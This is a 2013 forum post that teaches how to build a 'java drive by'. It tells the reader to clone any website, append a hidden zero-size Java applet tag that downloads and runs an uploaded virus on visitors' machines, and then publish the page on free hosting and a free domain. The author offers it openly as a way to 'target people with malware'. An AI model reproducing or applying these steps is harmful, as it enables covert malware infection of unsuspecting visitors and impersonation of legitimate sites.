franxu Posted January 6, 2013 Report Posted January 6, 2013 Welcome to the tutorial on how to turn any site into a java drive by (JDB)What is a java drive by? A java drive by is a website, and when you visit the web site you will get a box displayed that says you need to run java and when they press run it downloads and executes your virus without the person knowing. These can be very good when you want to target people with malware.Set Up Firstly you are going to need to download the Java Drive By Files. Download: JDB - Shuffler.rar Once Downloaded you will need to extract it with a unzipping program such as 7 ZIP or Win Rar etc. 1. Find the website you would like to clone. (Use Google Chrome For This!) 2. Once your on the site, Right Click and click "Save As" and then put into the folder you have just extracted in the same folder as "client.jar" 3. Rename the file you got from the website you just saved to "index"Pictures of this story:4. Right click on index.html and press open with -> Notepad 5. Now you should see all the code for the website, scroll to the bottom of the text and make a few spaces and put the code in below.<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"> <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/yourprogram.exe"> </APPLET>Where it says yoursite.exe, you need to put a direct link to your file so upload your virus to: http://www.dlandexe.com/ and then add the direct link to the applet code. 6. Save your website in notepad by pressing either CTR + S or File-> Save.Pictures of the story:You have now successfully created a working java drive by, when you open the index page it should look like this:Now you need to upload it to a web site so you are going to need a domain + hosting Free hosting that doesn't delete your site: Free Web Hosting - No purchase required. (I host mine their) Free Domain:Dot TK - Free Domains for Allhttp://www.co.cc/ I am not going to make a tutorial on this as it is pretty straight forward, register a domain and sign up for your hosting and then update your nameservers to your web hosting and then upload your Java Drive By in the Public_Html folder. If this helped show your likes with a comment ! ;D Quote